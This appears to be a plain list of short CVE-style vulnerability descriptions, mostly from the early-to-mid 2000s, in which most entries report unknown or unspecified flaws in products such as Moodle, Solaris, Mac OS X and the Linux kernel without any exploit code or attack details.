The addUser function in UserManager.java in Free Web Chat 2.0 allows remote attackers to cause a denial of service (uncaught NullPointerException) via unknown attack vectors that cause the usrName variable to be null.
Unspecified vulnerability in ASN.1 Compiler (asn1c) before 0.9.7 has unknown impact and attack vectors when processing "CHOICE" types with "indefinite length structures."
Unspecified vulnerability in ASN.1 Compiler (asn1c) before 0.9.7 has unknown impact and attack vectors when processing "ANY" type tags.
Unspecified vulnerability in Journalness 3.0.7 and earlier allows remote attackers to create or modify posts via unknown attack vectors.
The (1) bos.rte.serv_aid or (2) bos.rte.console filesets in IBM AIX 5.1 and 5.2 allow local users to overwrite arbitrary files via a symlink attack on temporary files via unknown attack vectors.
Unspecified vulnerability in Sesamie 1.0 allows remote anonymous attackers to gain access to repositories of other users via unknown vectors.
Unknown vulnerability in Rippy the Aggregator before 0.10, when register_globals is enabled, has unknown attack vectors and impact, possibly related to the "user-controlled filter."
The documentation for CuteNews 1.3.6 and possibly other versions specifies that files under cutenews/data must be manually given world-writable permissions, which allows local users to insert false news, delete news, and possibly gain privileges or have other unknown impact.
Unspecified vulnerability in meindlSOFT Cute PHP Library (aka cphplib) 0.46 has unknown impact and attack vectors, related to regular expressions.
The acl_check function in phpGroupWare 0.9.16RC2 always returns True, even when mkdir does not behave as expected, which could allow remote attackers to obtain sensitive information via WebDAV from users' home directories that lack .htaccess files, and possibly has other unknown impacts.
Unspecified vulnerability in IBM Tivoli SecureWay Policy Director 3.8, Access Manager for e-business 3.9 to 5.1, Access Manager Identity Manager Solution 5.1, Configuration Manager 4.2, Configuration Manager for Automated Teller Machines 2.1.0, and IBM WebSphere Everyplace Server, Service Provider Offering for Multi-platforms 2.1.3 to 2.15 allow remote attackers to hijack sessions of authenticated users via unknown attack vectors involving certain cookies, aka "Potential Credential Impersonation Attack."
Secure Computing Corporation Sidewinder G2 6.1.0.01 allows remote attackers to cause a denial of service (SMTP proxy failure) via unknown attack vendors involving an "extremely busy network."  NOTE: this might not be a vulnerability because the embedded monitoring sub-system automatically restarts after the failure.
Multiple SQL injection vulnerabilities in Dynix (formerly known as epixtech) WebPAC allow remote attackers to execute arbitrary SQL commands via unknown attack vectors, resulting in an ability to execute stored procedures, bypass login authentication, and cause an unspecified denial of service to backend databases.
Unknown vulnerability in Network Appliance NetCache 5.2 and Data ONTAP 6.0 allows remote attackers to cause a denial of service (panic and reboot) and possibly other impacts via unknown attack vectors, possibly related to unspecified worms, as identified by bug ID
Unspecified vulnerability in SurgeMail before 2.2c10 has unknown impact and attack vectors, related to a "Webmail security bug."
Unknown vulnerability in IlohaMail before 0.8.14-rc1 has unknown impact and attack vectors.
Unspecified vulnerability in Hitachi Web Page Generator and Web Page Generator Enterprise 4.01 and earlier allows remote attackers to cause a denial of service via unknown attack vectors when a web site is "improperly accessed."
Unspecified vulnerability in the error handler in Hitachi Web Page Generator and Web Page Generator Enterprise 4.01 and earlier, when using the default error template and debug mode is set to ON, allows remote attackers to determine internal directory structures via unknown attack vectors.
Cross-site scripting (XSS) vulnerability in the error handler in Hitachi Web Page Generator and Web Page Generator Enterprise 4.01 and earlier, when using the default error template and debug mode is set to ON, allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
SQL injection vulnerability in the sloth TCL script in QuoteEngine before 1.2.0 allow remote attackers to execute arbitrary SQL commands via unknown vectors.
Unspecified vulnerability in MadBMS before 1.1.5 has unknown impact and attack vectors, related to logins.
Unknown vulnerability in POP3 in gnubiff before 2.0.0 allows remote attackers to cause a denial of service (application crash) via an "infinite" Unique IDentification Listing (UIDL) list.
Unknown vulnerability in gnubiff 1.2.0 and earlier allows local users to obtain passwords, related to the password table.
Unknown vulnerability in Tutti Nova 0.10 through 0.12 (Beta) and 0.9.4, when register_globals is enabled, has unknown impact and attack vectors.
Unknown vulnerability in Hitachi Cosminexus Portal Framework 01-00, 01-01, 01-02, 02-01, 02-02, 02-03, and other versions allows remote attackers to obtain sensitive information in the &lt;ut:cache&gt; tag library.
Directory traversal vulnerability in 1st Class Mail Server 4.01 allows remote attackers to read arbitrary files via a ".." (dot dot) sequences in unknown vectors.
Unspecified vulnerability in Kerio MailServer before 6.0.3 has unknown impact and unknown remote attack vectors, related to a "potential security issue."
Unknown vulnerability in The Ignition Project ignitionServer 0.1.2 through 0.3.1, with the linking service enabled, allows remote attackers to bypass authentication.
BEA WebLogic Server and WebLogic Express 8.1 through 8.1 SP2 allow remote attackers to cause a denial of service (network port consumption) via unknown actions in HTTPS sessions, which prevents the server from releasing the network port when the session ends.
Unknown vulnerability in the Web calendaring component of Ipswitch IMail Server before 8.13 allows remote attackers to cause a denial of service (crash) via "specific content."
Unknown vulnerability in Hitachi Job Management Partner (JP1) JP1/File Transmission Server/FTP 6 and 7, when running on HP-UX in trusted mode, allows attackers to bypass authentication and gain administrator rights.
Unknown vulnerability in sh_hash_compdata for Samhain 1.8.9 through 2.0.1 might allow attackers to cause a denial of service (null pointer dereference).
Unknown vulnerability in phpGroupWare before 0.9.14.002 has unknown attack vectors and impact, related to a "security hole" in the Setup/Config functionality.
Unknown "overflow" in the phpgw_config table for phpGroupWare before 0.9.14.002 has unknown attack vectors and impact.
passwd 0.68 does not check the return code for the pam_start function, which has unknown impact and attack vectors that may prevent "safe and proper operation" of PAM.
libuser 0.51.7 allows attackers to cause a denial of service (crash or disk consumption) via unknown attack vectors, related to read failures and other bugs.
The roster import functionality in Jabber Gadu-Gadu Transport (a.k.a. jabber-gg-transport) 2.0.x before 2.0.8, when using libgadu 1.0 and later, allows attackers to cause a denial of service via unknown vectors.
Unknown vulnerability in Jabber Gadu-Gadu Transport (a.k.a. jabber-gg-transport) 2.0.x before 2.0.8 allows remote attackers to cause a denial of service (infinite loop) via user re-registration.
Unknown multiple vulnerabilities in Oracle9i Database Server 9.0.1.4, 9.0.1.5, 9.2.0.3, and 9.2.0.4 allow local users with the ability to invoke SQL to cause a denial of service or obtain sensitive information.
Unknown vulnerability in the ASN.1/H.323/H.225 stack of VocalTec VGW120 and VGW480 allows remote attackers to cause a denial of service.
Unknown vulnerability in Novell GroupWise and GroupWise WebAccess 6.0 through 6.5, when running with Apache Web Server 1.3 for NetWare where Apache is loaded using GWAPACHE.CONF, allows remote attackers to read directories and files on the server.
Multiple cross-site scripting (XSS) vulnerabilities in CPAN WWW::Form before 1.13 allow remote attackers to inject arbitrary web script or HTML via unknown vectors.
Unknown vulnerability in DansGuardian before 2.6.1-13 allows remote attackers to bypass URL filters via a crafted request that causes a page to be added to the clean page cache.
Multiple unknown vulnerabilities in IBM Lotus Notes 6.5.x before 6.5.4 and 6.0.x before 6.0.5 have unknown impact and attack vectors, related to Java applets, as identified by (1) KSPR5YS6GR and (2) KSPR62F4D3.
Buffer overflow in IBM Lotus Notes 6.5.x before 6.5.3 and 6.0.x before 6.0.5 allows remote attackers to cause a denial of service (crash) via unknown vectors related to Java applets, as identified by KSPR62F4KN.
Unknown cross-site scripting (XSS) vulnerability in the web GUI in vHost before 3.10r1 has unknown impact and attack vectors.
Unknown vulnerability in Jigsaw before 2.2.4 has unknown impact and attack vectors, possibly related to the parsing of the URI.
Unknown vulnerability in IBM Parallel Environment (PE) 3.2 and 4.1 allows attackers to execute arbitrary commands as root via unknown vectors in the sample code.
UUDeview 0.5.20 and earlier handles temporary files insecurely during decoding, with unknown attack vectors and impact.
Unknown vulnerability in the "access code" in RemoteEditor before 0.1.6 has unknown impact and attack vectors, possibly involving a bypass of IP address restrictions.
Unknown vulnerability in the "access code" in SecureEditor before 0.1.2 has unknown impact and attack vectors, possibly involving a bypass of IP address restrictions.
Unknown vulnerability in RemoteEditor before 0.1.1 has unknown impact and attack vectors, related to "oversize submissions."
Unknown vulnerability in the "admin of paypal email addresses" in AudienceConnect before 1.0.beta.21 has unknown impact and attack vectors.
Multiple SQL injection vulnerabilities in Phorum 5.0.11 and earlier allow remote attackers to modify SQL statements via (1) the query string in read.php or (2) unknown vectors in file.php.
** DISPUTED ** Format string vulnerability in vsybase.c in vpopmail 5.4.2 and earlier has unknown impact and attack vectors.  NOTE: in a followup post, it was observed that the source code used constants that, when compiled, became static format strings.  Thus this is not a vulnerability.
Unknown vulnerability in Moodle before 1.3.4 has unknown impact and attack vectors, related to "strings in Moodle texts."
Unknown vulnerability in Moodle before 1.3.3 has unknown impact and attack vectors, related to language setting.
Unknown vulnerability in Moodle before 1.2 has unknown impact and attack vectors, related to improper filtering of text.
Unknown vulnerability in Moodle before 1.2 allows teachers to log in as administrators.
Unknown "front page vulnerability with Moodle servers" for Moodle before 1.3.2 has unknown impact and attack vectors.
Multiple unknown vulnerabilities in Oracle 9i Lite Mobile Server 5.0.0.0.0 through 5.0.2.9.0 allow remote authenticated users to gain privileges.
Multiple unknown vulnerabilities in yhttpd in yChat before 0.7 allow remote attackers to cause a denial of service (segmentation fault) via unknown vectors.
Unknown vulnerability in Sun Java System Web Server 6.0 SP7 and earlier and 6.1 SP1 and earlier, and Application Server 7 Update 4 and earlier, allows remote attackers to cause a denial of service (crash) via a malformed client certificate.
SQL injection vulnerability in Ideal Science IdealBB 1.4.9 through 1.5.3 allows remote attackers to execute arbitrary SQL commands via unknown vectors.
CRLF injection vulnerability in Ideal Science IdealBB 1.4.9 through 1.5.3 allows remote attackers to conduct HTTP response splitting attacks via unknown vectors.
Cross-site scripting (XSS) vulnerability in Ideal Science IdealBB 1.4.9 through 1.5.3 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
SQL injection vulnerability in NatterChat 1.12 allows remote attackers to execute arbitrary SQL commands via unknown vectors.
Unknown vulnerability in Veritas Cluster Server 1.0.1 through 4.0 allows local users to gain root access via unspecified vectors.
Directory traversal vulnerability in Unzoo 4.4-2 has unknown impact and attack vectors.
SQL injection vulnerability in DMXReady Site Chassis Manager allows remote attackers to execute arbitrary SQL commands via unknown vectors.
Cross-site scripting (XSS) vulnerability in DMXReady Site Chassis Manager allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Unknown vulnerability in ImagePage for MediaWiki 1.3.5, related to "filename validation," has unknown impact and attack vectors.
Unknown vulnerability in WeHelpBUS 0.1 allows remote attackers to execute arbitrary shell commands via the query string.
SQL injection vulnerability in DevoyBB Web Forum 1.0.0 allows remote attackers to execute arbitrary SQL commands via unknown vectors.
Cross-site scripting (XSS) vulnerability in DevoyBB Web Forum 1.0.0 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Multiple buffer overflows in XMLStarlet Command Line XML Toolkit 0.9.3 have unknown impact and attack vectors via (1) xml_elem.c and (2) xml_select.c.
Multiple unknown vulnerabilities in Online Recruitment Agency 1.0 have unknown impact and attack vectors.
Multiple unknown vulnerabilities in Real Estate Management Software 1.0 have unknown impact and attack vectors.
Unknown local vulnerability in the "change user" feature of Slava Astashonok Fprobe 1.0.5 and earlier has unknown impact and attack vectors.
Unknown versions of Symantec Norton AntiVirus and Microsoft Outlook allow attackers to cause a denial of service (crash) via malformed e-mail messages (1) without a body or (2) without a carriage return ("\n") separating the headers from the body.
Unknown vulnerability in the remote tape support (remote.c) in the RMT client for Jorg Schilling sdd 1.28 and 1.31 has unknown impact and attack vectors.
Unknown vulnerability in Adminedit.pl YaBB 1 Gold before 1.3.2 allows attackers to execute arbitrary code via settings.pl.
Unknown vulnerability in SandSurfer before 1.7.0 allows remote attackers to gain access as a logged-in user.
Unknown vulnerability in APC PowerChute Business Edition 6.0 through 7.0.1 allows remote attackers to cause a denial of service via unknown attack vectors.
SQL injection vulnerability in the art_print function in print.inc.php in unknown versions of jPortal before 2.3.1 allows remote attackers to inject arbitrary SQL commands via the id parameter.
Unknown vulnerability in SGI IRIX 6.5 through 6.5.22m allows remote attackers to cause a denial of service via a certain UDP packet.
The arch_get_unmapped_area function in mmap.c in the PaX patches for Linux kernel 2.6, when Address Space Layout Randomization (ASLR) is enabled, allows local users to cause a denial of service (infinite loop) via unknown attack vectors.
The ftp_syslog function in ftpd in SGI IRIX 6.5.20 "doesn't work with anonymous FTP," which has an unknown impact, possibly preventing the actions of anonymous users from being logged.
Unknown vulnerability in ftpd in SGI IRIX 6.5.20 through 6.5.23 allows remote attackers to cause a denial of service (hang) via the PORT mode.
Unknown vulnerability in ftpd in SGI IRIX 6.5.20 through 6.5.23 allows remote attackers to cause a denial of service (hang) via a link failure with Microsoft Windows.
Unknown vulnerability in Sun Java System Application Server 7.0 Update 2 and earlier, when a SOAP web service expects an array of objects as an argument, allows remote attackers to cause a denial of service (memory consumption).
Unknown vulnerability in ColdFusion MX 6.0 and 6.1, and JRun 4.0, when a SOAP web service expects an array of objects as an argument, allows remote attackers to cause a denial of service (memory consumption).
Unknown vulnerability in Sysbotz SimpleData 4.0.1 and possibly earlier versions allows remote attackers to gain access via a crafted URL and a certain cookie.
Multiple buffer overflows in sharutils 4.2.1 and earlier may allow attackers to execute arbitrary code via (1) long output from wc to shar, or (2) unknown vectors in unshar.
Buffer overflow in CDE libDtSvc on HP-UX B.11.00, B.11.04, B.11.11, and B.11.22 allows local users to gain root privileges via unknown vectors.
Unknown vulnerability in F-Secure Anti-Virus (FSAV) 4.52 for Linux before Hotfix 3 allows the Sober.D worm to bypass FASV.
Unknown vulnerability in Ethereal 0.8.13 to 0.10.2 allows attackers to cause a denial of service (segmentation fault) via a malformed color filter file.
Unknown vulnerability in HP Process Resource Manager (PRM) C.02.01[.01] and earlier, as used by HP-UX Workload Manager (WLM), allows local users to corrupt data files.
Opera 7.54 and earlier uses kfmclient exec to handle unknown MIME types, which allows remote attackers to execute arbitrary code via a shortcut or launcher that contains an Exec entry.
Unknown vulnerability in Serviceguard A.11.13 through A.11.16.00 and Cluster Object Manager A.01.03 and B.01.04 through B.03.00.01 on HP-UX, Serviceguard A.11.14.04 and A.11.15.04 and Cluster Object Manager B.02.01.02 and B.02.02.02 on HP Linux, allow remote attackers to gain privileges via unknown attack vectors.
Multiple unknown vulnerabilities in the ActiveX and HTML file browsers in Symantec Clientless VPN Gateway 4400 Series 5.0 have unknown attack vectors and unknown impact.
Unknown vulnerability in the management station in HP StorageWorks Command View XP 1.8B and earlier allows remote attackers to bypass access restrictions.
Unknown vulnerability in the PageEditor in MoinMoin 1.2.2 and earlier, related to Access Control Lists (ACL), has unknown impact.
Unknown vulnerability in MoinMoin 1.2.2 and earlier allows remote attackers to gain unauthorized access to administrator functions such as (1) revert and (2) delete.
Mozilla before 1.6 does not display the entire URL in the status bar when a link contains %00, which could allow remote attackers to trick users into clicking on unknown or untrusted sites and facilitate phishing attacks.
Unknown vulnerability in LiveConnect in Mozilla 1.7 beta allows remote attackers to read arbitrary files in known locations.
Unknown vulnerability in ScreenOS in Juniper Networks NetScreen firewall 3.x through 5.x allows remote attackers to cause a denial of service (device reboot or hang) via a crafted SSH v1 packet.
Unknown vulnerability in the tcsetattr function for Sun Solaris for SPARC 2.6, 7, and 8 allows local users to cause a denial of service (system hang).
Unknown vulnerability in the Veritas NetBackup Administrative Assistant interface for NetBackup BusinesServer 3.4, 3.4.1, and 4.5, DataCenter 3.4, 3.4.1, and 4.5, Enterprise Server 5.1, and NetBackup Server 5.0 and 5.1, allows attackers to execute arbitrary commands via the bpjava-susvc process, possibly related to the call-back feature.
Unknown vulnerability in System Administration Manager (SAM) in HP-UX B.11.00, B.11.11, B.11.22, and B.11.23 allows local users to gain privileges.
Unknown vulnerability in conv_fix in Sun Solaris 7 through 9, when invoked by conv_lpd, allows local users to overwrite arbitrary files.
Unknown vulnerability in the sendfilev function in Sun Solaris 8 and 9 allows local users to cause a denial of service (system panic) via unknown vectors.
Unknown vulnerability in the TCP/IP stack for Sun Solaris 8 and 9 allows local users to cause a denial of service (system panic) via unknown vectors.
Unknown vulnerability in LDAP on Sun Solaris 8 and 9, when using Role Based Access Control (RBAC), allows local users to execute certain commands with additional privileges.
Unknown vulnerability in the rwho daemon (in.rwhod) for Solaris 7 through 9 allows remote attackers to execute arbitrary code.
Multiple buffer overflows in Sun Java System Web Proxy Server (formerly Sun ONE Proxy Server) 3.6 through 3.6 SP4 allow remote attackers to execute arbitrary code via unknown vectors, possibly CONNECT requests.
Unknown vulnerability in in.named on Solaris 8 allows remote attackers to cause a denial of service (process crash).
Unknown vulnerability in Sun StorEdge Enterprise Storage Manager (ESM) 2.1 for Solaris 8 and Solaris 9 allows local users with the "ESMUser" role to gain root access.
Unknown vulnerability in newgrp in HP-UX B.11.00, B.11.04, and B.11.11 allows local users to gain elevated privileges.
Unknown vulnerability in the system call filtering code in the audit subsystem for Red Hat Enterprise Linux 3 allows local users to cause a denial of service (system crash) via unknown vectors.
Unknown vulnerability in the rwho daemon (rwhod) before 0.17, on little endian architectures, allows remote attackers to cause a denial of service (application crash).
Unknown vulnerability in the 32bit emulation code in Linux 2.4 on AMD64 systems allows local users to gain privileges.
Unknown vulnerability in the DICOM dissector in Ethereal 0.10.4 through 0.10.7 allows remote attackers to cause a denial of service (application crash).
Unknown vulnerability in chroot on SCO UnixWare 7.1.1 through 7.1.4 allows local users to escape the chroot jail and conduct unauthorized activities.
Unknown vulnerability in Apple Mac OS X 10.3.6 server, when using Kerberos authentication and Cyrus IMAP allows local users to access mailboxes of other users.
Multiple "overflows" in the io_edgeport driver for Linux kernel 2.4.x have unknown impact and unknown attack vectors.
Midnight commander (mc) 4.5.55 and earlier allows remote attackers to cause a denial of service (infinite loop) via unknown attack vectors.
Multiple buffer overflows in Midnight Commander (mc) 4.5.55 and earlier allow remote attackers to have an unknown impact.
Multiple format string vulnerabilities in Midnight Commander (mc) 4.5.55 and earlier allow remote attackers to have an unknown impact.
Unknown vulnerability in the passwd_check function in Shadow 4.0.4.1, and possibly other versions before 4.0.5, allows local users to conduct unauthorized activities when an error from a pam_chauthtok function call is not properly handled.
Unspecified vulnerability in the ptrace MIPS assembly code in Linux kernel 2.4 before 2.4.17 allows local users to gain privileges via unknown vectors.
Unknown vulnerability in the dotlock implementation in mailutils before 1:0.5-4 on Debian GNU/Linux allows attackers to gain privileges.
Unknown vulnerability in MySQL 3.23.58 and earlier, when a local user has privileges for a database whose name includes a "_" (underscore), grants privileges to other databases that have similar names, which can allow the user to conduct unauthorized activities.
Multiple unknown vulnerabilities in viewcvs before 0.9.2, when exporting a repository as a tar archive, does not properly implement the hide_cvsroot and forbidden settings, which could allow remote attackers to gain sensitive information.
Unknown vulnerability in ecartis 0.x before 0.129a+1.0.0-snap20020514-1.3 and 1.x before 1.0.0+cvs.20030911-8 allows attackers in the same domain to gain administrator privileges and modify configuration.
Unknown vulnerability in Microsoft Excel 2000, 2002, 2001 for Mac, and v.X for Mac allows remote attackers to execute arbitrary code via a malicious file containing certain parameters that are not properly validated.
Unknown vulnerability in the SG_IO functionality in ide-cd allows local users to bypass read-only access and perform unauthorized write and erase operations.
Unknown vulnerability in the Linux kernel before 2.4.23, on the AMD AMD64 and Intel EM64T architectures, associated with "setting up TSS limits," allows local users to cause a denial of service (crash) and possibly execute arbitrary code.
Unknown vulnerability in Apache 2.0.51 prevents "the merging of the Satisfy directive," which could allow attackers to obtain access to restricted resources contrary to the specified authentication configuration.
Unknown vulnerability in foomatic-rip in Foomatic before 3.0.2 allows local users or remote attackers with access to CUPS to execute arbitrary commands.
Unknown vulnerability in redhat-config-nfs before 1.0.13, when shares are exported to multiple hosts, can produce incorrect permissions and prevent the all_squash option from being applied.
Buffer overflow in Medal of Honor (1) Allied Assault 1.11v9 and earlier, (2) Breakthrough 2.40b and earlier, and (3) Spearhead 2.15 and earlier, when playing on a Local Area Network (LAN), allows remote attackers to execute arbitrary code via vectors such as (1) the getinfo query, (2) the connect packet, and other unknown vectors.
Unknown vulnerability in (1) duplicates.cgi and (2) buglist.cgi in Bugzilla 2.16.x before 2.16.6, 2.18 before 2.18rc1, when configured to hide products, allows remote attackers to view hidden products.
Unknown vulnerability in the administrative controls in Bugzilla 2.17.1 through 2.17.7 allows users with "grant membership" privileges to grant memberships to groups that the user does not control.
Unknown vulnerability in 4D WebSTAR 5.3.2 and earlier allows remote attackers to read the php.ini configuration file and possibly obtain sensitive information.
Buffer overflow in LHA 1.14 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown vectors related to "command line processing," a different vulnerability than CVE-2004-0771.  NOTE: this issue may be REJECTED if there are not any cases in which LHA is setuid or is otherwise used across security boundaries.
Buffer overflow in Samba 2.2.x to 2.2.9, and 3.0.0 to 3.0.4, when the "mangling method = hash" option is enabled in smb.conf, has unknown impact and attack vectors.
Unknown vulnerability in the Basic Security Module (BSM), when configured to audit either the Administrative (ad) or the System-Wide Administration (as) audit class in Solaris 7, 8, and 9, allows local users to cause a denial of service (kernel panic).
Unknown vulnerability in Sun Java Runtime Environment (JRE) 1.4.2 through 1.4.2_03 allows remote attackers to cause a denial of service (virtual machine hang).
Unknown vulnerability in Horde IMP 3.2.3 and earlier, before a "security fix," does not properly validate input, which allows remote attackers to execute arbitrary script as other users via script or HTML in an e-mail message, possibly triggering a cross-site scripting (XSS) vulnerability.
Unknown vulnerability in Webmin 1.140 allows remote attackers to bypass access control rules and gain read access to configuration information for a module.
Unknown versions of Internet Explorer and Outlook allow remote attackers to spoof a legitimate URL in the status bar via A HREF tags with modified "alt" values that point to the legitimate site, combined with an image map whose href points to the malicious site, which facilitates a "phishing" attack.
SQL injection vulnerability in SquirrelMail before 1.4.3 RC1 allows remote attackers to execute unauthorized SQL statements, with unknown impact, probably via abook_database.php.
Unknown vulnerability in AppleFileServer for Mac OS X 10.3.4, related to "the use of SSH and reporting errors," has unknown impact and attack vectors.
Unknown vulnerability in Mac OS X 10.3.4, related to "handling of process IDs during package installation," a different vulnerability than CVE-2004-0516.
Unknown vulnerability in Mac OS X 10.3.4, related to "package installation scripts," a different vulnerability than CVE-2004-0517.
Unknown vulnerability in LoginWindow for Mac OS X 10.3.4, related to "handling of console log files."
Unknown vulnerability in LoginWindow for Mac OS X 10.3.4, related to "handling of directory services lookups."
Unspecified vulnerability in Mac OS X before 10.3.4 has unknown impact and attack vectors related to "logging when tracing system calls."
Multiple unknown vulnerabilities in MMDF on OpenServer 5.0.6 and 5.0.7, and possibly other operating systems, may allow attackers to cause a denial of service by triggering a core dump.
Multiple unknown vulnerabilities in MMDF on OpenServer 5.0.6 and 5.0.7, and possibly other operating systems, may allow attackers to cause a denial of service by triggering a null dereference.
The SPNEGO dissector in Ethereal 0.9.8 to 0.10.3 allows remote attackers to cause a denial of service (crash) via unknown attack vectors that cause a null pointer dereference.
The AIM dissector in Ethereal 0.10.3 allows remote attackers to cause a denial of service (assert error) via unknown attack vectors.
Unknown vulnerability in Linux kernel 2.x may allow local users to modify the group ID of files, such as NFS exported files in kernel 2.4.
Multiple unknown vulnerabilities in Linux kernel 2.6 allow local users to gain privileges or access kernel memory, a different set of vulnerabilities than those identified in CVE-2004-0495, as found by the Sparse source code checking tool.
Multiple unknown vulnerabilities in Linux kernel 2.4 and 2.6 allow local users to gain privileges or access kernel memory, as found by the Sparse source code checking tool.
mshtml.dll in Microsoft Internet Explorer 6.0.2800 allows remote attackers to cause a denial of service (crash) via a table containing a form that crosses multiple td elements, and whose "float: left" class is defined in a link to a CSS stylesheet after the end of the table, which may trigger a null dereference.
Unknown vulnerability in rpc.mountd for SGI IRIX 6.5.24 allows remote attackers to cause a denial of service (infinite loop) via certain RPC requests.
Unknown versions of Mozilla allow remote attackers to cause a denial of service (high CPU/RAM consumption) using Javascript with an infinite loop  that continues to add input to a form, possibly as the result of inserting control characters, as demonstrated using an embedded ctrl-U.
Unknown vulnerability in 3Com OfficeConnect Remote 812 ADSL Router allows remote attackers to bypass authentication via repeated attempts using any username and password.  NOTE: this identifier was inadvertently re-used for another issue due to a typo; that issue was assigned CVE-2004-0447.  This candidate is ONLY for the ADSL router bypass.
Unknown vulnerability in Linux before 2.4.26 for IA64 allows local users to cause a denial of service, with unknown impact.  NOTE: due to a typo, this issue was accidentally assigned CVE-2004-0477.  This is the proper candidate to use for the Linux local DoS.
Unknown vulnerability related to "the handling of large requests" in RAdmin for Apple Mac OS X 10.3.3 and Mac OS X 10.2.8 may allow attackers to have unknown impact via unknown attack vectors.
Unknown vulnerability in CoreFoundation in Mac OS X 10.3.3 and Mac OS X 10.3.3 Server, related to "the handling of an environment variable," has unknown attack vectors and unknown impact.
Unknown vulnerability in libtasn1 0.1.x before 0.1.2, and 0.2.x before 0.2.7, related to the DER parsing functions.
Unknown vulnerability in Mail for Mac OS X 10.3.3 and 10.2.8, with unknown impact, related to "the handling of HTML-formatted email."
Unknown vulnerability in the CUPS printing system in Mac OS X 10.3.3 and Mac OS X 10.2.8 with unknown impact, possibly related to a configuration file setting.
Unknown vulnerability in passwd(1) in Solaris 8.0 and 9.0 allows local users to gain privileges via unknown attack vectors.
Unknown vulnerability in nCipher Hardware Security Modules (HSM) 1.67.x through 1.99.x allows local users to access secrets stored in the module's run-time memory via certain sequences of commands.
Unknown vulnerability in Cisco ONS 15327 before 4.1(3), ONS 15454 before 4.6(1), ONS 15454 SD before 4.1(3), and Cisco ONS15600 before 1.3(0) allows a superuser whose account is locked out, disabled, or suspended to gain unauthorized access via a Telnet connection to the VxWorks shell.
Multiple vulnerabilities in Midnight Commander (mc) before 4.6.0, with unknown impact, related to "Insecure temporary file and directory creations."
The framebuffer driver in Linux kernel 2.6.x does not properly use the fb_copy_cmap function, with unknown impact.
Unknown vulnerability in the Graphics Rendering Engine processes of Microsoft Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code via (1) Windows Metafile (WMF) or (2) Enhanced Metafile (EMF) image formats that involve "an unchecked buffer."
Unknown vulnerability in CoreFoundation for Mac OS X 10.3.2, related to "notification logging."
Unknown vulnerability in Safari web browser for Mac OS X 10.2.8 related to "the display of URLs in the status bar."
Unknown vulnerability in xitalk 1.1.11 and earlier allows local users to execute arbitrary commands.
Unknown vulnerability in the bsd.a kernel networking for SGI IRIX 6.5.22 through 6.5.25, and possibly earlier versions, in which "t_unbind changes t_bind's behavior," has unknown impact and attack vectors.
Unknown vulnerability in init for IRIX 6.5.20 through 6.5.24 allows local users to cause a denial of service (system panic) as a result of "page invalidation issues."
Unknown vulnerability in the H.323 protocol implementation in Windows 98, Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code.
Multiple unknown vulnerabilities in XFree86 4.1.0 to 4.3.0, related to improper handling of font files, a different set of vulnerabilities than CVE-2004-0083 and CVE-2004-0084.
Unknown vulnerability in mod_python 2.7.9 allows remote attackers to cause a denial of service (httpd crash) via a certain query string, a variant of CAN-2003-0973.
Unknown vulnerability in Safari web browser in Mac OS X 10.2.8 and 10.3.2, with unknown impact.
** DISPUTED **
Unknown vulnerability in Windows File Sharing for Mac OS X 10.1.5 through 10.3.2 does not "shutdown properly," which has unknown impact and attack vectors.
Unknown vulnerability in the Mail application for Mac OS X 10.3.2 has unknown impact and attack vectors, a different vulnerability than CVE-2004-0085.
Unknown vulnerability in the Mail application for Mac OS X 10.1.5 and 10.2.8 with unknown impact, a different vulnerability than CVE-2004-0086.
OpenSSL 0.9.6 before 0.9.6d does not properly handle unknown message types, which allows remote attackers to cause a denial of service (infinite loop), as demonstrated using the Codenomicon TLS Test Tool.
Unknown vulnerability in Linux kernel before 2.4.22 allows local users to gain privileges, related to "R128 DRI limits checking."
Unknown vulnerability in the eflags checking in the 32-bit ptrace emulation for the Linux kernel on AMD64 systems allows local users to gain privileges.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in ISS BlackICE PC Protection. It has been rated as problematic. Affected by this issue is the Update Handler. The manipulation with an unknown input leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
Unspecified vulnerability in Sun ONE (aka iPlanet) Web Server 6.0 SP3 through SP5 on Windows allows remote attackers to cause a denial of service (daemon crash) via unknown vectors.
Unspecified vulnerability in Sun ONE (aka iPlanet) Web Server 4.1 before SP13 and 6.0 before SP6 on Windows allows attackers to cause a denial of service (daemon crash) via unknown vectors.
Unspecified vulnerability in Novell GroupWise 6 SP3 WebAccess before Revision F has unknown impact and attack vectors related to "malicious script."
Unspecified vulnerability in My Photo Gallery 3.5, and possibly earlier versions, has unknown impact and attack vectors.
Unspecified vulnerability in CDE dtmailpr of HP Tru64 4.0F through 5.1B allows local users to gain privileges via unknown attack vectors. NOTE: due to lack of details in the vendor advisory, it is not clear whether this is the same issue as CVE-1999-0840.
Unspecified vulnerability in the non-SSL web agent in various HP Management Agent products allows local users or remote attackers to gain privileges or cause a denial of service via unknown attack vectors.
Multiple cross-site scripting (XSS) vulnerabilities in (1) login.php, (2) register.php, (3) post.php, and (4) common.php in Phorum before 3.4.3 allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
Album.pl 6.1 allows remote attackers to execute arbitrary commands, when an alternative configuration file is used, via unknown attack vectors.
Multiple unspecified vulnerabilities in the installer for SYSLINUX 2.01, when running setuid root, allow local users to gain privileges via unknown vectors.
Unspecified vulnerability in mod_mysql_logger shared object in SuckBot 0.006 allows remote attackers to cause a denial of service (seg fault) via unknown attack vectors.
Unknown vulnerability in VERITAS Bare Metal Restore (BMR) of Tivoli Storage Manager (TSM) 3.1.0 through 3.2.1 allows remote attackers to gain root privileges on the BMR Main Server.
The "file handling" in sort in HP-UX 10.01 through 10.20, and 11.00 through 11.11 is "incorrect," which allows attackers to gain access or cause a denial of service via unknown vectors.
Cross-site scripting (XSS) vulnerability in mod.php in eNdonesia 8.2 allows remote attackers to inject arbitrary web script or HTML via the mod parameter.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
mod.php in eNdonesia 8.2 allows remote attackers to obtain sensitive information via a ' (quote) value in the lng parameter, which reveals the path in an error message.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
